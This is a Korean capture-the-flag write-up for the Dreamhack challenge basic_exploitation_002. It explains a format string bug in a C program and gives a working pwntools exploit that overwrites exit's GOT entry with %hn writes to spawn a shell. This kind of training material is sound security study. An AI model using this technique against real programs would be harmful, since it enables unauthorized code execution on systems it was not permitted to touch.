[Pwnable] Basic_exploitation

Wargame/Dreamhack

[Pwnable] Basic_exploitation_002

남바오 2023. 2. 16. 11:59

1. Code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

void get_shell() {
    system("/bin/sh");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();

    read(0, buf, 0x80);
    printf(buf);

    exit(0);
}

2. Write Up

코드를 보면, buf 를 0x80 만큼 받고, read 도 0x80만큼 하기 때문에 BoF는 안된다는 것을 알 수 있다.

그 다음 printf 를 보면 서식 문자 없이 출력하기 때문에 이 부분에서 Format string bug 가 발생하게 된다.

   0x0804861c <+0>:     push   %ebp
   0x0804861d <+1>:     mov    %esp,%ebp
   0x0804861f <+3>:     add    $0xffffff80,%esp
   0x08048622 <+6>:     call   0x80485c2 <initialize>
   0x08048627 <+11>:    push   $0x80
   0x0804862c <+16>:    lea    -0x80(%ebp),%eax
   0x0804862f <+19>:    push   %eax
   0x08048630 <+20>:    push   $0x0
   0x08048632 <+22>:    call   0x8048410 <read@plt>
   0x08048637 <+27>:    add    $0xc,%esp
   0x0804863a <+30>:    lea    -0x80(%ebp),%eax
   0x0804863d <+33>:    push   %eax
   0x0804863e <+34>:    call   0x8048420 <printf@plt>
   0x08048643 <+39>:    add    $0x4,%esp
   0x08048646 <+42>:    push   $0x0
   0x08048648 <+44>:    call   0x8048470 <exit@plt>

여기서 NX 보호 기법이 활성화되어있기 때문에 쉘 코드 실행은 불가하고,

RELRO가 Partial 로 되어있기 때문에 GOT Overwrite 를 해야된다는 점을 유추할 수 있다.

디버깅을 해서 exit_got 주소를 get_shell 주소로 덮어야 하기 때문에 주소를 찾아준다.

PLT는 코드, GOT는 주소값이 저장되어 있기 때문에

* Exploit Code

from pwn import *

p = remote("host3.dreamhack.games", 22617)
e = ELF("./basic_exploitation_002")

get_shell = 0x8048609
exit = 0x804a024

payload = p32(exit+2) + p32(exit) + b"%2044c%1$hn%32261c%2$hn"

p.sendline(payload)
p.interactive()

구조를 살펴보면, exit GOT 주소 작성을 해준 뒤 get_shell의 주소를 인자로 보내주었다.

%n은 4바이트씩 인자에 넘겨주는데, get_shell의 주소는 값이 크기 때문에 2바이트씩 나눠서 전송하기 위해

$hn 를 사용했다. 이 부분은 FSB 에서 많이 사용되는 기능이기 때문에 꼭 기억!

%1$hn은 처음 2바이트만, %2$hn도 그 다음 2바이트 이런식으로

exit_got : 0x8609

exit_got + 2 : 0x804

이므로,

0x804 - 0x8 = 2044 (exit GOT 주소 작성에 8 바이트를 사용했기 때문에0

0x8609 - 0x804 = 32261

→ 이 부분에서 계속 헤맸다ㅠㅠ